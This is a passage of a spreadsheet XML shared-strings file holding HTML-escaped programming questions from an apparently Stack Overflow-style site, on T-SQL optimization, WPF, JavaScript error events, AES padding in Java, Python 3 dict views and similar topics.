&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; To make it clearer, this is an layer of information sitting on top of Google Street View (flash), the trouble is that I can't move the street view around where the layer overlaps.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>T-SQL Query Optimization</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on some upgrades to an internal web analytics system we provide for our clients (in the absence of a preferred vendor or Google Analytics), and I'm working on the following query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select 
    path as EntryPage, 
    count(Path) as [Count] 
from 
    (
    	/* Sub-query 1 */
    	select 
    		pv2.path
    	from 
    		pageviews pv2 
    			inner join
    				(
    					/* Sub-query 2 */
    					select
    						pv1.sessionid,
    						min(pv1.created) as created
    					from
    						pageviews pv1 
    							inner join Sessions s1 on pv1.SessionID = s1.SessionID
    							inner join Visitors v1 on s1.VisitorID = v1.VisitorID
    					where
    						pv1.Domain = isnull(@Domain, pv1.Domain) and
    						v1.Campaign = @Campaign
    					group by
    						pv1.sessionid
    				) t1 on pv2.sessionid = t1.sessionid and pv2.created = t1.created
    ) t2
group by 
    Path;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tested this query with 2 million rows in the PageViews table and it takes about 20 seconds to run. I'm noticing a clustered index scan twice in the execution plan, both times it hits the PageViews table. There is a clustered index on the Created column in that table.&lt;/p&gt;
&lt;p&gt;The problem is that in both cases it appears to iterate over all 2 million rows, which I believe is the performance bottleneck. Is there anything I can do to prevent this, or am I pretty much maxed out as far as optimization goes?&lt;/p&gt;
&lt;p&gt;For reference, the purpose of the query is to find the first page view for each session.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; After much frustration, despite the help received here, I could not make this query work. Therefore, I decided to simply store a reference to the entry page (and now exit page) in the sessions table, which allows me to do the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select
    pv.Path,
    count(*)
from
    PageViews pv
    	inner join Sessions s on pv.SessionID = s.SessionID
    		and pv.PageViewID = s.ExitPage
    	inner join Visitors v on s.VisitorID = v.VisitorID
where
    (
        @Domain is null or 
        pv.Domain = @Domain
    ) and
    v.Campaign = @Campaign
group by pv.Path;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This query runs in 3 seconds or less. Now I either have to update the entry/exit page in real time as the page views are recorded (the optimal solution) or run a batch update at some interval. Either way, it solves the problem, but not like I'd intended. &lt;/p&gt;
&lt;p&gt;Edit Edit: Adding a missing index (after cleaning up from last night) reduced the query to mere milliseconds). Woo hoo!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Javascript fire an event for unhandled/uncaught exceptions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to log unhandled javascript exceptions. Is there an event that fires when an exception isn't caught? I'm looking to catch the exceptions before they cause javascript errors in the browser, but I'd rather not run my entire application inside of a try/catch. Any help would be appreciated. Thanks!&lt;/p&gt;
&lt;p&gt;Update: 
tvanfosson pointed out onerror as a possibility. It is not part of a spec and is only available in IE or Gecko based browsers.&lt;/p&gt;
&lt;p&gt;For more information - &lt;a href="http://books.google.com/books?id=tKszhx-XkzYC&amp;amp;pg=PA386&amp;amp;lpg=PA386&amp;amp;dq=safari+onerror+javascript&amp;amp;source=web&amp;amp;ots=gQaGbpUnjG&amp;amp;sig=iBCtOQs0aH_EAzSbWlGa9v5flyo#PPA387,M1"&gt;http://books.google.com/books?id=tKszhx-XkzYC&amp;amp;pg=PA386&amp;amp;lpg=PA386&amp;amp;dq=safari+onerror+javascript&amp;amp;source=web&amp;amp;ots=gQaGbpUnjG&amp;amp;sig=iBCtOQs0aH_EAzSbWlGa9v5flyo#PPA387,M1&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;OnError Support Table - &lt;a href="http://www.quirksmode.org/dom/events/error.html"&gt;http://www.quirksmode.org/dom/events/error.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Mozilla's documentation - &lt;a href="https://developer.mozilla.org/en/DOM/window.onerror"&gt;https://developer.mozilla.org/en/DOM/window.onerror&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;WebKit Bug Report - &lt;a href="https://bugs.webkit.org/show_bug.cgi?id=8519"&gt;https://bugs.webkit.org/show_bug.cgi?id=8519&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I remove minimize and maximize from a resizable window in WPF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;WPF doesn't provide the ability to have a window that allows resize but doesn't have maximize or minimize buttons. I'd like to able to make such a window so I can have resizable dialog boxes.&lt;/p&gt;
&lt;p&gt;I'm aware the solution will mean using pinvoke but I'm not sure what to call and how. A search of pinvoke.net didn't turn up any thing that jumped out at me as what I needed, mainly I'm sure because Windows Forms does provide the &lt;code&gt;CanMinimize&lt;/code&gt; and &lt;code&gt;CanMaximize&lt;/code&gt; properties on its windows.&lt;/p&gt;
&lt;p&gt;Could someone point me towards or provide code (C# preferred) on how to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best approach for applying styles to massive amounts of items?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my LOB apps I usually wind up with containers that contain a bunch of different textblocks and textboxes for users to enter data. Normally I need to apply a certain margin or vertical/horizontal alignment to each control.&lt;/p&gt;
&lt;p&gt;Let's say I have Grid on my form that looks like this (a lot of markup was eliminated for brevity):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Grid&amp;gt;
   &amp;lt;Grid.ColumnDefinitions.../&amp;gt;
   &amp;lt;Grid.RowDefinitions.../&amp;gt;
   &amp;lt;TextBlock Text="MyLabel" /&amp;gt;
   &amp;lt;TextBox Text={Binding ...}/&amp;gt;
   .
   '
   &amp;lt;!-- Repated a bunch more times along with all of the Grid.Row, Grid.Column definitions --&amp;gt;
&amp;lt;/Grid&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now let's say I need every single item contained in my grid to have Margin="3,1" VerticalContentAlignment="Left" VerticalAlignment="Center". There are several ways to achieve this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Set the properties directly on each control - BAD!! Does not allow for skinning or centralizing styles.&lt;/li&gt;
&lt;li&gt;Create a Style with an x:Key="MyStyleName" and apply the style to each control. Better...Makes centralizing styles and skinning more manageable but still requires a ton of markup, and can become unwieldy.&lt;/li&gt;
&lt;li&gt;Create a global style (i.e. don't specify an x:Key and set the TargetType={x:Type TextBox/TextBlock} - BAD!! The problem with this is that it affects ALL controls in the app that don't explicity override this style. This can be bad for things like menus, grids, and other controls that use textblocks and textboxes.&lt;/li&gt;
&lt;li&gt;Create a style that targets the Grid and explicitely sets the dependecy propety values like &lt;code&gt;&amp;lt;Setter Property="Frameworkelement.Margin" Value="3,1" /&amp;gt;&lt;/code&gt; Not bad...it correctly applies the style to every element in it's content, but also applies it directly to the Grid itself...not exactly what I want.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So what approach do you take and why? What works the best?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Looking for an example of using Lucene.net with ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you implement the search capabilities of Lucene.net in asp.net? If possible, please include links or example code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Disadvantages of using void* pointers in C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are many drawbacks to using &lt;code&gt;void *&lt;/code&gt; in C (memory related, type related, efficiency wise ...). In spite of them we use them a lot for the flexibility they provide.&lt;/p&gt;
&lt;p&gt;List the disadvantages/drawbacks using &lt;code&gt;void *&lt;/code&gt; (and preferred solution in C - if possible).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;
please go through the follwoing link:
&lt;a href="http://attractivechaos.wordpress.com/2008/10/02/using-void-in-generic-c-programming-may-be-inefficient/" rel="nofollow"&gt;http://attractivechaos.wordpress.com/2008/10/02/using-void-in-generic-c-programming-may-be-inefficient/&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Retrieve the uniqueidentifier key value for a record</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;in context of SQL Server 2005, I have a table for which the primary key is a uniqueidentifier (GUID), with a default value generated by the newid() function. I want to write a stored procedure that inserts a new record into the table. How do I get the record's PK value? for an identity-declared field, this is easy - I call scope_identity(). How should I proceed with guids?&lt;/p&gt;
&lt;p&gt;Thanks,
Lucian&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# console applications all 16bit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was reading up about NTVDM.exe as I build a quick test console app and it crashed on a friends machine complaining about this EXE.&lt;/p&gt;
&lt;p&gt;As I understand it all DOS cmd windows (C# console apps included) run as 16bit not 32bit.&lt;/p&gt;
&lt;p&gt;Is this true?  Does this mean all my works console app back office apps are running as 16bit rather than making the most of the 32bit available?&lt;/p&gt;
&lt;p&gt;What about Windows services?  As I believe we wrote it as a console app then made it run as a windows service?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL - how to use index in WHERE x IN (&lt;subquery&gt;)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using this query to get all employees of {clients with name starting with lowercase "a"}:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM employees 
  WHERE client_id IN (SELECT id FROM clients WHERE name LIKE 'a%')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Column &lt;code&gt;employees.client_id&lt;/code&gt; is an int, with &lt;code&gt;INDEX client_id (index_id)&lt;/code&gt;. The subquery should IMHO return a list of id-s, which is then used in the WHERE clause.&lt;/p&gt;
&lt;p&gt;When I &lt;code&gt;EXPLAIN&lt;/code&gt; the query, the primary query uses no indexes (&lt;code&gt;type:ALL&lt;/code&gt;). But when I &lt;code&gt;EXPLAIN&lt;/code&gt;
 a list taken from the subquery (e.g. &lt;code&gt;SELECT ... WHERE client_id IN (121,184,501)&lt;/code&gt;), the &lt;code&gt;EXPLAIN&lt;/code&gt; switches to &lt;code&gt;type:range&lt;/code&gt;, and this query gets faster by 50%.&lt;/p&gt;
&lt;p&gt;How can I make the query use the index for the data returned by subquery - or, is there a more efficient way of retrieving this data? (Retrieving the id-list to application server, joining it and sending a second query is even more expensive here).&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firefox manipulation of saved form data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a Firefox plugin for manipulating and deleting saved form data?
In the browser there is only the option to delete all data.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Make C# algorithm more efficient</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C# method that projects the value of a number from an interval to a target interval.&lt;br /&gt;
&lt;strong&gt;For example:&lt;/strong&gt; we have an interval of -1000 and 9000 and a value of 5000; if we want to project this value to an interval of 0..100 we get 60.&lt;/p&gt;
&lt;p&gt;Here is the method: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/// &amp;lt;summary&amp;gt;  
/// Projects a value to an interval
/// &amp;lt;/summary&amp;gt;
/// &amp;lt;param name="val"&amp;gt;The value that needs to be projected&amp;lt;/param&amp;gt;  
/// &amp;lt;param name="min"&amp;gt;The minimum of the interval the value comes from&amp;lt;/param&amp;gt;  
/// &amp;lt;param name="max"&amp;gt;The maximum of the interval the value comes from&amp;lt;/param&amp;gt;  
/// &amp;lt;param name="intervalTop"&amp;gt;The minimum of the interval the value will 
/// be projected to&amp;lt;/param&amp;gt;  
/// &amp;lt;param name="intervalBottom"&amp;gt;The maximum of the interval the value will 
/// be projected to&amp;lt;/param&amp;gt;  
/// &amp;lt;returns&amp;gt;Projected value&amp;lt;/returns&amp;gt; 
public decimal ProjectValueToInterval(decimal val,  
                                      decimal min,  
                                      decimal max,  
                                      decimal intervalBottom, 
                                      decimal intervalTop)  
{  
    decimal newMin = Math.Min(0, min);
    decimal valueIntervalSize = Math.Abs(max - newMin);
    decimal targetIntervalSize = Math.Abs(intervalTop - intervalBottom);
    decimal projectionUnit = targetIntervalSize / valueIntervalSize;
    return (val * projectionUnit) + Math.Abs((newMin * projectionUnit));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This method needs to be called for thousands of values.&lt;br /&gt;
I was wondering if there is a more efficient way to do this in C#? If yes, what changes do you suggest?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best method for formatting email when using System.Net.Mail</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi I'm using &lt;code&gt;System.Net.Mail&lt;/code&gt; to send some HTML formatted emails.&lt;/p&gt;
&lt;p&gt;What is the correct method for inserting css into the email message?&lt;/p&gt;
&lt;p&gt;I know I can apply formatting to each item, but I'ld rather use style sheets..&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;
I should have mentioned that this is for an internal application, and I expect 99% of users to be using Outlook or other client, but never hotmail or gmail etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I use decimal, float or double for this simple math result?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing some really simple math and saving the result to a MS SQL2008 DB.&lt;/p&gt;
&lt;p&gt;I'm &lt;em&gt;averaging&lt;/em&gt; out the some numbers, which are byte values between 1&amp;lt;-&gt;5. I wish to record probably 2 decimal places only. I don't care about rounding for the 2nd decimal place (eg. a 1.155 == 1.5 or 1.6 .. i'm not too phased).&lt;/p&gt;
&lt;p&gt;So .. should i store the average result as a float, decimal or double?&lt;/p&gt;
&lt;p&gt;When i check what LINQ returns, it can return all three values!&lt;/p&gt;
&lt;p&gt;Lastly, what would be the relevant SQL datatype field, also.&lt;/p&gt;
&lt;p&gt;cheers!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>import text file containing line breaks into excel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a plain text file looking like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;"some  
 text  
 containing  
 line  
 breaks"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm trying to talk &lt;code&gt;excel 2004 (Mac, v.11.5)&lt;/code&gt; into opening this file correctly. I'd expect to see only one cell (A1) containing all of the above (without the quotes)...&lt;/p&gt;
&lt;p&gt;But alas, I can't make it happen, because Excel seems to insist on using the CR's as row delimiters, even if I set the text qualifier to double quote. I was sort of hoping that Excel would understand that those line breaks are part of the value - they are embedded in double quotes which should qualify them as part of the value. So my Excel sheet has 5 rows, which is not what I want.&lt;/p&gt;
&lt;p&gt;I also tried this Applescript to no avail:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tell application "Microsoft Excel"
    activate
    open text file filename Â¬
    "Users:maximiliantyrtania:Desktop:linebreaks" data type delimited Â¬
    text qualifier text qualifier double quote Â¬
    field info {{1, text format}} Â¬
    origin Macintosh with tab
end tell
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I could tell Excel to use a row delimiter other than CR (or LF), well, I'd be a happy camper, but excel seems to allow the change of the field delimiter only, not the row delimiter.&lt;/p&gt;
&lt;p&gt;Any pointers?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Max 
Excel's open&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I create a dojox.data.XmlStore with a url pointing to a different port or server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the following, I want to replace &lt;code&gt;/books.xml&lt;/code&gt; with something like &lt;code&gt;http://server:port/books&lt;/code&gt;. In essence the XmlStore to be served by some other server or port than the one serving this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div dojoType="dojox.data.XmlStore" url="/books.xml" jsId="fileStore_book" rootItem="book"&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;div dojoType="dojox.grid.data.DojoData" jsId="model_fileStore_book" store="fileStore_book" query="{title:'*'}"&amp;gt;&amp;lt;/div&amp;gt;
&amp;lt;div id="fileGrid_book"
    dojoType="dojox.Grid"
    model="model_fileStore_book"
    rowsPerPage="10"
    style="width: 400px; height: 300px;"&amp;gt;
  &amp;lt;script type="dojo/method"&amp;gt;this.setStructure([{cells: [[{field: "isbn", name: "ISBN", width: 10}, {field: "author", name: "Author", width: 10}, {field: "title", name: "Title", width: 'auto'}]]}]);&amp;lt;/script&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>ASP.NET GridView "Client-Side Confirmation when Deleting" stopped working on ie - how come?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A few months ago, I have programmed an ASP.NET GridView with a custom "Delete" LinkButton and Client-Side JavaScript Confirmation according to this msdn article:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/bb428868.aspx" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/bb428868.aspx&lt;/a&gt; (published in April 2007)&lt;/p&gt;
&lt;p&gt;or e.g. &lt;a href="http://stackoverflow.com/questions/218733/javascript-before-aspbuttonfield-click"&gt;http://stackoverflow.com/questions/218733/javascript-before-aspbuttonfield-click&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The code looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;ItemTemplate&amp;gt;
  &amp;lt;asp:LinkButton ID="deleteLinkButton" runat="server" 
    Text="Delete"
    OnCommand="deleteLinkButtonButton_Command"   
    CommandName='&amp;lt;%# Eval("id") %&amp;gt;'
    OnClientClick='&amp;lt;%# Eval("id", "return confirm(\"Delete Id {0}?\")") %&amp;gt;'
  /&amp;gt;
&amp;lt;/ItemTemplate&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Surprisingly, "Cancel" doesn't work no more with my ie (Version: &lt;code&gt;6.0.2900.2180.xpsp_sp2_qfe.080814-1242&lt;/code&gt;) - it always deletes the row. With Opera (Version 9.62) it still works as expeced and described in the msdn article. More surprisingly, 
on a fellow worker's machine with the same ie version, it still works ("Cancel" will not delete the row).&lt;/p&gt;
&lt;p&gt;The generated code looks like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a onclick="return confirm(...);" href="javascript:__doPostBack('...')"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As confirm(...) returns false on "Cancel", I expect the __doPostBack event in the href not to be fired. Are there any strange ie settings I accidentally might have changed? What else could be the cause of this weird behaviour? Or is this a "please reinstall WinXP" issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to use GZIP compression on classic ASP pages?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We've got a classic ASP application that is putting out some very large reports, where the resulting HTML is several MBs. We've made a lot of progress in trimming this down by reducing extraneous HTML, but I'd like to know if there's any way to enable GZIP compression on these dynamic .asp pages. I'm sure compressing them would be an enormous benefit to the file size.&lt;/p&gt;
&lt;p&gt;All of the GZIP compression information I've seen only talks about supporting files or .aspx pages.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create empty C# event handlers automatically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It is not possible to fire an event in C# that has no handlers attached to it. So before each call it is necessary to check if the event is null.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if ( MyEvent != null ) {
  MyEvent( param1, param2 );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to keep my code as clean as possible and get rid of those null checks. I don't think it will affect performance very much, at least not in my case.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyEvent( param1, param2 );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Right now I solve this by adding an empty inline handler to each event manually. This is error prone, since I need to remember to do that etc.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Initialize() {
  MyEvent += new MyEvent( (p1,p2) =&amp;gt; { } );
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to generate empty handlers for all events of a given class automatically using reflection and some CLR magic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to delegate a method call to another thread?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following problem: Multithreaded WPF application, Model View Presenter Implementation. Presenters and Views that belong together are created on a separate thread and get a separate Dispatcher. Now someone calls from another thread a method on the Presenter. I am intercepting the call, and now begins the problem: if the call comes from the same thread as the presenter, i want to proceed with the call, else invoke the call on the Dispatcherthread, so that i don't need to care about UI calls.
I have already read about the use of SynchronizationContext, but that doesnt seem to work for me because if the calling thread is no UI thread i can't compare the 2 contexts. Whats a possible, working and elegant solution ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java Cipher - AES Padding Problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a AES cipher with a 16 byte block size. &lt;/p&gt;
&lt;p&gt;If I try and encrypt a 16 byte string I have no problems, but any other length not a multiple of 16 is throwing an exception. &lt;/p&gt;
&lt;p&gt;I know with 3-DES you can specify a padding type as part of the algorithm and it's handled with no extra work (e.g. DES/CBC/PKCS5Padding), but is there a way to specify this with AES? &lt;/p&gt;
&lt;p&gt;Or do I need to pad the pytes manually to a multiple of 16, and then strip them when I decrypt? Here is an abbreviated code sample. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;encrypt = Cipher.getInstance("AES", provider);
encrypt.init(Cipher.ENCRYPT_MODE, key) ;
byte[] encrypted = encrypt.doFinal(plainTxt.getBytes()) ;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any and all replies appreciated! &lt;/p&gt;
&lt;p&gt;Thanks in advance,
CiarÃ¡n&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python 3.0 - dict methods return views - why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;dict methods dict.keys(), dict.items()
  and dict.values() return â€œviewsâ€
  instead of lists.
  &lt;a href="http://docs.python.org/dev/3.0/whatsnew//3.0.html"&gt;http://docs.python.org/dev/3.0/whatsnew//3.0.html&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;First of all how is a view different from an iterator?  Secondly, what is the benefit of this change?  Is it just for performance reasons?  &lt;/p&gt;
&lt;p&gt;It doesn't seem intuitive to me, i.e., I'm asking for a list of thing (give me all your keys) and I'm getting something else back.  Will this confuse people?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit Testing in web applications that use databases</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a web application that uses the database for Users, Security/roles, and to store content.&lt;/p&gt;
&lt;p&gt;It seems a little daunting to me to begin on the road of unit testing because I have to make sure my database has been initialized properly for my tests to run.&lt;/p&gt;
&lt;p&gt;What are common practices to help in this regard?&lt;/p&gt;
&lt;p&gt;i.e. while developing/testing, I might delete a user, but for my test to pass that user has to be in the database, along with his profile, security settings etc.&lt;/p&gt;
&lt;p&gt;I know I can create a setup script, something to recreat the databas etc.  &lt;/p&gt;
&lt;p&gt;&lt;b&gt;I don't want to end up spending my entire time maintaining my tests and ensuring my database is in sych&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Or is that the cost of Unit Testing/TDD?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Newbie: Visual Studio 2008 Standard Edition: How do I see more than "Reporting" project type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just bought a VS 2008 Standard license upgrade. (I was using the integrated shell for learning F# and express edition for c#. )&lt;/p&gt;
&lt;p&gt;I performed the install, re-booted, and when I click file-&gt;new-&gt;project ... all I get is the choice for "Reporting" project type under C#. IS there a way to expand the number of choices for the various project types?&lt;/p&gt;
&lt;p&gt;( I just uninstalled all things visual studio 2008 shell, express, etc... and the install went OK.  )&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET DropDownList AutoPostback Not Working - What Am I Missing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am attempting to get a DropDownList to AutoPostBack via an UpdatePanel when the selected item is changed. I'm going a little stir-crazy as to why this isn't working.&lt;/p&gt;
&lt;p&gt;Does anyone have any quick ideas?&lt;/p&gt;
&lt;p&gt;ASPX page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:UpdatePanel ID="UpdatePanel1" runat="server" UpdateMode="Always" ChildrenAsTriggers="true" &amp;gt;      
  &amp;lt;ContentTemplate&amp;gt;
    &amp;lt;asp:DropDownList ID="DropDownList1" runat="server" AutoPostBack="True"  onselectedindexchanged="DropDownList1_SelectedIndexChanged"&amp;gt;
      &amp;lt;asp:ListItem&amp;gt;item 1&amp;lt;/asp:ListItem&amp;gt;
      &amp;lt;asp:ListItem&amp;gt;item 2&amp;lt;/asp:ListItem&amp;gt;
    &amp;lt;/asp:DropDownList&amp;gt;
  &amp;lt;/ContentTemplate&amp;gt;
&amp;lt;/asp:UpdatePanel&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Code-behind (I put a breakpoint on the string assignment to capture the postback):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void DropDownList1_SelectedIndexChanged(object sender, EventArgs e)
{
  string s = "";
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;OK, I have it working now. Very weird. All it took was a restart of Visual Studio. This is the kind of thing that frightens me as a developer ;) I think I've seen similar before, where VS gets "out of sync" wrt the assembly it's running.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;FYI I am running VS 2008 Web Developer Express.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thanks to those that answered.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hide Comments in Code in Unix Environment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work in a Unix environment with the typical Unix tools (emacs, vim, gvim, sunstudio, etc)&lt;/p&gt;
&lt;p&gt;My project has huge gross boilerplate comments on every method. It makes the files thousands of lines long, with a couple hundred lines of actual code. I may be exagerrating a bit but you get the idea. I am looking for a way when viewing these files to hide (not remove) all comments so I can quickly go through the code. C++ comments '//' only.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I fix a .NET Webservice timeout causing a UnsupportedMediaException in a Java client?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently have a .net SOAP web service with a timeout on the request that I set using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Server.ScriptTimeout = TIME_OUT;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I then have java client calling said web service. However when the timeout is reached I get this exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Exception in thread "Thread-9" com.sun.xml.ws.server.UnsupportedMediaException: Unsupported Content-Type: text/html; charset=utf-8 Supported ones are: [text/xml]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is happening is that the web service returns an html error page with the http timeout code (503 I think?), which my Java code (generated using WSDLimport) doesn't expect.&lt;/p&gt;
&lt;p&gt;Now I could catch the error UnsupportedMediaException on the client and attempt to translate it into something more meaningful, but I would prefer to send out a more specific timeout exception on the web service side. Is there anyway in a .net web service to send out a better exception when a timeout occurs, or any other way to handle this situation better?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;br&gt;
I am using the WSDLImport from the glassfish 2 distribution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PNG image won't show in IE7 or Firefox but works in Opera</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I got a webservice which creates a PNG-file and returns a link to it.
Then this graphic is used by a website (ASP.NET).&lt;/p&gt;
&lt;p&gt;IE7 &amp;amp; Firefox 3 can't show this image but in Opera 9.5 it works fine.&lt;/p&gt;
&lt;p&gt;Did anyone run across the same problem before?&lt;/p&gt;
&lt;p&gt;Edit:
Content-type is set to image/png.
The image is created with the library from a 3rd party vendor which is not available to the public.&lt;/p&gt;
&lt;p&gt;Any chance to check the png-file for compliance to the standard?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why are banking passwords so weak?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;em&gt;Out of interest and because it infuriates me, I was wondering if SOmebody here might happen to work for a bank or otherwise know the answer to this.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I've used a few online banking sites (UK and N.America) and they universally enforce a password pattern of &lt;code&gt;/[\w\d]{6,8}/&lt;/code&gt; Sometimes, maybe you get to use underscore, but never ever do you get to have &lt;code&gt;/.{6,20}/&lt;/code&gt; that you get (more or less) with just about every !banking site you'll encounter. &lt;/p&gt;
&lt;p&gt;I have been told that this is to do with storage space, but the maths don't seem to support that. Assuming that banks keep shadow tables for your password record, let's generously say an average of 10 per account, then doubling the allowed length of the password and doubling the bit width of the character set based on an 8char 8bit existing format means an &lt;em&gt;extra&lt;/em&gt; 11*2*8 = 176 bytes per account, so ~168Mb per 1M accounts. Let's say it's a gigantic bank supporting 100M accounts - that's still only 16Gb!&lt;/p&gt;
&lt;p&gt;It can't be that simple can it? Surely my numbers are off base.&lt;/p&gt;
&lt;p&gt;Or is the answer here that banks being banks they have no better reason for this than they're plodding dinosaurs.&lt;/p&gt;
&lt;p&gt;Does anyone know a technical reason why my password for www.random.com/forum is stronger than the one for my bank?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>List all files changed by a particular user in subversion</t>
  </si>
  <si>
